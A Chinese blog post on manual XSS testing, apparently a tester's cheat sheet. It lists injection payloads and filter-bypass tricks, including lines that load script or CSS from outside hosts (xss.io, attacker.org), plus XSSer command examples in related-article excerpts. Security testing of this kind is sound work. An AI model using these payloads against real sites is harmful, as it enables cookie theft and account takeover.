XSS漏洞手工检测

最新推荐文章于 2024-06-12 09:57:17 发布
最新推荐文章于 2024-06-12 09:57:17 发布
阅读量6.7k 收藏 17
点赞数 3
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzkkoo8/article/details/78812845
版权

xss漏洞手工检测

2017年12月14日 17:44:57

1、基本检测

'"<>&空格 \\看有没有逃逸
常用语句
"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)
<script>alert("XSS")</script>
<script src="http://xss.io/a.js"></script>
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">

2、绕过技巧

常用绕过

另一个绕过的办法就是在属性和= 之间插入一个空格:
<div onclick ="alert('xss')">
<scr<script>ipt>alert("XSS")</scr<script>ipt>
行内样式
<div style="color: expression(alert('XSS'))">
<div style="color: '<'; color: expression(alert('XSS'))">
<a href="java&#115;cript:alert('xss')">link</a>     //url中输入
<a href='vbscript:MsgBox("XSS")'>link</a>       //老IE或者兼容模式的IE11
'-confirm`1`-'
'-confirm(1)-'

利用字符编码
%c1;alert(/xss/);//

绕过长度限制
"onclick=alert(1)//
"><!--
--><script>alert(xss);<script>

CSS import绕过
IE 浏览器支持在 CSS 中扩展 JavaScript,这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的,因为攻击者现在可以在原始页面中执行

<style>
@import url("http://attacker.org/malicious.css");
</style>
malicious.css:
body {
    color: expression(alert('XSS'));
}
为了绕过对 @import 的过滤,可以在 CSS 中使用反斜杠进行绕过:
<style>
@imp\ort url("http://attacker.org/malicious.css");
</style>
IE 浏览器会接受反斜杠,但是我们绕过了过滤器。
zzkkoo8
关注
  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2237
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
如何测试XSS漏洞
phphot
03-12 1998
黑盒手动测试有输入框的页面测试               对于非富文本在输入框中输入特殊字符  提交               在提交后的页面查看源代码根据关键字tiehua查找源代码中的tiehua前后的’是否已经被转义成               &lt&quot&gt&apos 如果未被转义说明这个输入框存在xss漏洞的嫌疑(提交bug)。         
简单的XSS手动测试
weixin_33850890的博客
09-21 262
好吧,我也是初学者,写这个随笔,主要也是为了记录,自学到的点。 简单的案例,见http://www.cnblogs.com/trhimily/p/3898915.html 总结一下主要的点: 1. url上参数使用脚本(get); 2. post参数使用脚本(post): 这里要注意,不是传参就可以,还需要 1)传参数 2)数据库存储 3)显示:调用...
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
最新发布
zzz6583zz的博客
06-12 691
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
XSS漏洞检测手段
Kevin's Blog
05-05 7711
文章目录一、手工注入检测1.1 Cheat Sheet二、自动化工具检测2.1 BurpSuite之XSS Validator2.1.1 运行原理2.1.2 插件安装2.1.3 phantomjs安装2.1.4 下载xss.js2.1.5 配置XSS Validator2.1.6 配置Intruder模块2.1.7 XSS漏洞检测2.1.8 工具优缺点2.2 神器之XSSer2.2.1 工具介绍 ...
手工检测注入点
07-19
在IT安全领域,手工检测注入点是一项至关重要的技能,它涉及到对系统或应用程序的深入理解和潜在漏洞的识别。本文将详细解析这个主题,以便帮助学习者掌握如何手工检测注入点,提升网络安全防护能力。 首先,我们...
戏耍XSS的一些技巧
02-20
当你手工或者软件挖到一个页面的xss时(无论是反射xss或者储蓄xss都可以),这个时候想要深入的利用这个漏洞,该怎么做呢?用WebRTC来内网端口检测?盗取cookies(登陆页面和注册页面一般都不会有用户cookies)?用...
手工注入辅助工具
09-30
手工注入辅助工具是一种在IT安全领域中用于检测和修复系统漏洞的专业工具,尤其适用于网络应用程序的安全测试。在软件开发过程中,安全是至关重要的一个环节,而手工注入辅助工具可以帮助开发者和安全研究人员查找并...
XSS 常用的手动测试方法
为了低调的博客
09-06 182
前面先进行闭标签,并在体中使用onload函数他是在加载白名单对象的时候,进行调用alert方法弹出cookie信息,最前面加#避免数据后面的payload传到服务器,就是为了让他的数据能够在浏览器页面进行显示。事件型参数绕过,这个的意思就是为了闭合,标签,并插入一个没有的图片,使它出错然后执行alert弹窗命令。双写/大小写绕过(大写的话就改成大写的)
我是如何黑盒测试XSS漏洞的?
weixin_30947043的博客
11-20 386
在挖掘SRC中,很多人挖洞都是挖掘的XSS漏洞,随着Web安全的普及,人类越来越注重自身网站的安全。 来一篇简单的黑盒测试XSS漏洞的一点方法和个人的一些见解 一般测试XSS漏洞,一般是简单测试下,而不是直接深层次的绕过代码直接去碰,测试XSS常规的XSS测试语句是: "><img/src/onerror=alert(1)> 屡试不爽 先讲...
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection from File, with tor proxy and spoofing HTTP Referer headers: $ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" ------------------- * Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat): $ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w ------------------- * Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads): $ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
Web安全XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
XSS探测
qq_37697566的博客
03-02 180
XSS探测 实验地址:https://xss-quiz.int21h.jp/ stage2 "><script>alert(document.domain)</script> stage3 于Select中选择即可 Japan</option><script>alert(document.domain);</script> ...
怎么查找xss漏洞_如何查找和利用XSS
weixin_26722031的博客
08-24 2005
怎么查找xss漏洞 重点 (Top highlight)An article for newbies! (as requested) 面向新手的文章! (按照要求) This article is for the newbies who are asking me to write this. Of course there are pro’s everywhere. You may not w...
我来教你如何寻找XSS漏洞
MyDriverC
12-16 9070
http://blog.sina.com.cn/s/blog_68d342d90100nh7b.html 今天本来在看一个站,偶然发现存在XSS漏洞,就留意了下URL形式,然后谷歌一下,就不费什么力气的得到了大量存在XSS漏洞的站点页面,正好今天闲来无事,我也得给我的博客写点东西,不然又要被搜索引擎惩罚了… 这里,简单说一下如何寻找XSS漏洞,一般的,我在浏览网站时,发现URL中存
XSS手工测试阶段式小结
L1m93的博客
03-29 1972
XSS攻击方式千变万化,越是学习这一块的知识就越感到自己对这一方面知识的匮乏。也如海绵一般,我也渴望汲取更多新的知识。文章仅仅是作为一个阶段式的小结。 反射型XSS 在用户单击时触发,只执行一次。 存在:搜索框,用户登陆口 攻击成本比存储型XSS高。 经过后端,不经过数据库。 数据流向:浏览器》后端》浏览器 存储型XSS 比反射型XSS威胁性高。 存在:留言,评论,博...
使用Fiddler的X5S插件查找XSS漏洞
2301_77512689的博客
05-03 417
这里需要先说明的是,该工具不是自动化工具,只是列出哪里可能存在XSS漏洞,所以要使用该 工具,读者需要了解XSS,知道什么样的编码可能导致产生XSS漏洞。另外,读者需要知道的是,该工具基本上只能检测反射型XSS问题,不能检测基于DOM的XSS漏洞,也不能检测存储型XSS,因为这种漏洞的数据不会在请求和响应的参数中出现。同时该工具花费的时间也比较长,因为我们必须手动检测每个URL,有可能错过某个包含XSS漏洞的页面,就没办法对这个页面进行检测了,因此也有可能在浪费了大量时间后因软件的局限性没有发现漏洞
xss漏洞手工构造payload
07-28
XSS漏洞是一种常见的网络安全漏洞,攻击者可以通过在网页中注入恶意的脚本代码来获取用户的敏感信息或者执行恶意操作。手工构造XSS payload是指攻击者通过编写特定的恶意代码来利用XSS漏洞。 在构造XSS payload时,攻击者通常会利用一些特殊的字符或者代码来绕过网站的过滤机制,使恶意代码能够被执行。一些常见的XSS payload包括但不限于以下几种: 1. `<script>alert('XSS')</script>`:这是最简单的XSS payload,它会在网页中弹出一个提示框。 2. `<img src="x" onerror="alert('XSS')">`:这个payload利用了`<img>`标签的`onerror`事件,当图片加载失败时会执行其中的代码。 3. `<svg/onload=alert('XSS')>`:这个payload利用了SVG标签的`onload`事件,当SVG图像加载完成时会执行其中的代码。 4. `javascript:alert('XSS')`:这个payload利用了JavaScript伪协议,直接在URL中执行JavaScript代码。 需要注意的是,构造XSS payload是一种攻击行为,严禁利用这些技术进行非法攻击。本文提到的payload仅供学习和研究用途,请遵守法律法规,不要进行任何违法行为。 #### 引用[.reference_title] - *1* *2* *3* [反射型XSS、存储型XSS和DOM型XSS的简介及XSS常见payload构造及变形](https://blog.csdn.net/bwxzdjn/article/details/123645177)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值